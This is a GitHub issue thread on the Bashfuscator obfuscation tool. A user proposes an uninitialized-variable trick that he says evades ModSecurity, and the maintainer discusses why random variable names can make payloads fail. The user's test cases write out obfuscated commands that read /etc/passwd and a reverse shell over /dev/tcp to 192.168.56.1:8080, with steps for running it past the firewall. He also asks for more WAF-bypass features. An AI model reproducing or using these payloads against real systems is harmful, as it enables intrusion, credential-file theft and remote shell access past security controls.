Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add The Uninitialized Variable obfuscate to mutators #25

Open
dmknght opened this issue Nov 16, 2019 · 2 comments
Open

Add The Uninitialized Variable obfuscate to mutators #25

dmknght opened this issue Nov 16, 2019 · 2 comments

Comments

@dmknght
Copy link

dmknght commented Nov 16, 2019

I've tested this method and it bypassed mod security perfectly so i think it will be wonderful if bashfucscator can add this method.
Test case 1:

  • Command ls -la get blocked by mod security
  • ls$u -la worked
    Test case 2:
  • command cat /etc/passwd get blocked by mod security
  • command cat$u /etc$x/passwd$y worked
    Test case 3:
    -/bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1 doesn't get blocked but it can't create connection (reverse shell) so i did it manually (Use pipeline may have blocked by mod security by characters |, ;, &&)
    Step 1: echo$x "/bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1" > file name
    Step 2: bash$a filename

Source:https://www.secjuice.com/web-application-firewall-waf-evasion/

@capnspacehook
Copy link
Member

Bashfuscator already does this to a certain extent; the special variables $@ and $* are liberally placed throughout obfuscated payloads. The reason only these variables are used, is because they are special reserved variables for Bash, and due to the way Bashfuscator works, they will almost always be blank.

Generating randomly named variables and inserting them in Bash payloads is pretty risky... Bashfuscator can't know what variables will be already used in the environment in which payloads will be run, so there is a chance that payloads will fail in certain environments.

For instance, say that in the environment you're currently in, the variable $foo is initialized. Say also that you generate a payload with Bashfuscator, and using your uninitialized variable obfuscation method, it by chance inserts $foo into part of the payload. Because $foo is set, the payload will fail to execute. See the issue?

@dmknght
Copy link
Author

dmknght commented Nov 22, 2019

Bashfuscator already does this to a certain extent; the special variables $@ and $* are liberally placed throughout obfuscated payloads.

I noticed about this before i created the issue. But current modules use pipeline to execute command so it can't bypass waf (mod security for example). So is there any chance to run command without pipeline (like add options --no-pipeline?). IMO create obfuscated payload that can bypass waf is the thing that everybody needs :D

Generating randomly named variables and inserting them in Bash payloads is pretty risky...

Understood :D

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants